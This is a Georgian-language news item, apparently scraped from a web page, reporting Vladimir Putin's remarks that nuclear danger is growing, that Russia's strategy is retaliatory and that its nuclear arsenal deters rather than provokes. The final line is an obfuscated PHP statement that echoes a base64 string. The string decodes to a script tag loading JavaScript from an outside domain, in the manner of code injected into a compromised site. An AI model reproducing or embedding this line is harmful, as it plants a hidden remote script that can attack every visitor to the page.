celsiusi
ავერსი საქკაბელი

რუსეთის პრეზიდენტ ვლადიმერ პუტინის განცხადებით, ბირთვული საფრთხე იზრდება, თუმცა რუსეთი თუ პირველი არ გამოიყენებს ბირთვულ იარაღს, ეს ნიშნავს, რომ ვერც საპასუხოდ გამოიყენებს, რადგან რუსეთის ტერიტორიაზე ბირთვული დარტყმის განხორციელების შემთხვევაში, შესაძლებლობა, განახორციელონ საპასუხო დარტყმა, მნიშვნელოვნად შეიზღუდება.

ამასთან, პუტინი აღნიშნავს, რომ რუსული სტრატეგია დაფუძნებულია საპასუხო დარტყმაზე. „როდესაც ჩვენ გვარტყამენ, საპასუხო დარტყმას ვაყენებთ“.
„ჩვენ ჩვენს მოკავშირეებს ხელთ არსებული ყველა საშუალებით დავიცავთ. ჭკუიდან არ შევშლილვართ. ვაცნობიერებთ, რა არის ბირთვული იარაღი. ჩვენ გვაქვს ეს საშუალებები და უფრო მოწინავე სახით, ვიდრე რომელიმე სხვა ბირთვულ ქვეყანას. არ ვაპირებთ, სამართებელივით ვიქნიოთ ეს იარაღი მთელ მსოფლიოში. თუმცა გამოვდივართ იქიდან, რომ ის გვაქვს. ეს არა მაპროვოცირებელი, არამედ შემაკავებელი ფაქტორია“, – განაცხადა პუტინმა.

531
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");